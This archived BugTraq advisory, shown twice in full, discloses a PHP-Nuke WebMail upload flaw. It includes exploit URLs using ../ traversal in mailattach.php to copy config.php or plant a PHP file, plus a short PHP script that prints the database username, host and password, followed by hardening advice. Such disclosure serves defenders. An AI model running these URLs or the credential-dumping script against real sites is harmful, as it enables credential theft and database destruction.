BugTraq
Back to list
|
Post reply
PHP-Nuke : config.php reveled with php uploaded file.(Affect all uploads implementations in phpnuke).SECURING PHP-NUKE.
Mar 01 2003 12:39PM
Lorenzo Hernandez Garcia-Hierro (webmaster lorenzohgh com)
Hello again friends,
Proving in my sites www.novappc.com , i discovered that the PHP-nuke code
injection for write the content of config.php in a file have more
vulnerabilities than one ,i explain it:
PROBLEM:
Webmail module is an unsafely mail system , but not all the package, only
the little file called mailattach.php , the first vulnerability
discovered is this:
http://NUKESITE/modules/WebMail/mailattach.php?%
20userfile=../../config.php&userfile_name=../attachments/file.txt&attach
me
nts=1
(It enables that the attacker writes all the content og config.php ,
passwords and users , in a file file.txt)
THE NEW VULNERABILITY:
I discovered it proving the other old ,
CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP
FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1
DESCRIPTION:
[DIR TO PHP FILE]:
This is the directory of your php file that prints the content of the
variables
in config.php , the code of the file is:
<?php
include ("../../config.php")
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>
This file load variables from config.php to the h4ckz.php file end prints
all content of the variables using echo function of php.
You only must access the temporal file in the server in the directory
that you put in the &userfile_name of the xploit url.
WHAT CAN BE HAPPEN?
All the passwords of config.php are given , the attacker can be use it
for modify, rename or DELETE the database depending of the privileges and
the situation of the web admin tool , like phpnuke and the access
configuration of database , acept tcp/ip connects or not accept.
ONLY AFFECT WEBMAIL?
No, all the modules that upload files can be unsafely because you can
modify the variables of the xploit url to run with other module that
upload files.
SOLUTION (SECURING PHP-NUKE):
FIRST: Modify code of all the files that upload files of course for die
when the file is called remotely ( QUERY_STRING remote and REFERER
remote) , you an find more info about this in the modules.php file.
SECOND: Be sure (optional) that the php-nuke not use a root user for
database.
THIRT: Modify mysql/postgre/etc config for only accept connects of
localhost and the web admin apps. like php admin ( on remote servers )
cant run with your server ;-)
FOURTH: Activate only the modules that you use, Xd.
CONTACT:
EMAIL: admin (at) novappc (dot) com [email concealed]
WEBSITE: novappc.com novappc.mine.nu
NAME: LORENZO MANUEL HERNANDEZ GARCIA-HIERRO
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Hello again friends,
Proving in my sites www.novappc.com , i discovered that the PHP-nuke code
injection for write the content of config.php in a file have more
vulnerabilities than one ,i explain it:
PROBLEM:
Webmail module is an unsafely mail system , but not all the package, only
the little file called mailattach.php , the first vulnerability
discovered is this:
http://NUKESITE/modules/WebMail/mailattach.php?%
20userfile=../../config.php&userfile_name=../attachments/file.txt&attach
me
nts=1
(It enables that the attacker writes all the content og config.php ,
passwords and users , in a file file.txt)
THE NEW VULNERABILITY:
I discovered it proving the other old ,
CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP
FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1
DESCRIPTION:
[DIR TO PHP FILE]:
This is the directory of your php file that prints the content of the
variables
in config.php , the code of the file is:
<?php
include ("../../config.php")
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>
This file load variables from config.php to the h4ckz.php file end prints
all content of the variables using echo function of php.
You only must access the temporal file in the server in the directory
that you put in the &userfile_name of the xploit url.
WHAT CAN BE HAPPEN?
All the passwords of config.php are given , the attacker can be use it
for modify, rename or DELETE the database depending of the privileges and
the situation of the web admin tool , like phpnuke and the access
configuration of database , acept tcp/ip connects or not accept.
ONLY AFFECT WEBMAIL?
No, all the modules that upload files can be unsafely because you can
modify the variables of the xploit url to run with other module that
upload files.
SOLUTION (SECURING PHP-NUKE):
FIRST: Modify code of all the files that upload files of course for die
when the file is called remotely ( QUERY_STRING remote and REFERER
remote) , you an find more info about this in the modules.php file.
SECOND: Be sure (optional) that the php-nuke not use a root user for
database.
THIRT: Modify mysql/postgre/etc config for only accept connects of
localhost and the web admin apps. like php admin ( on remote servers )
cant run with your server ;-)
FOURTH: Activate only the modules that you use, Xd.
CONTACT:
EMAIL: admin (at) novappc (dot) com [email concealed]
WEBSITE: novappc.com novappc.mine.nu
NAME: LORENZO MANUEL HERNANDEZ GARCIA-HIERRO
[ reply ]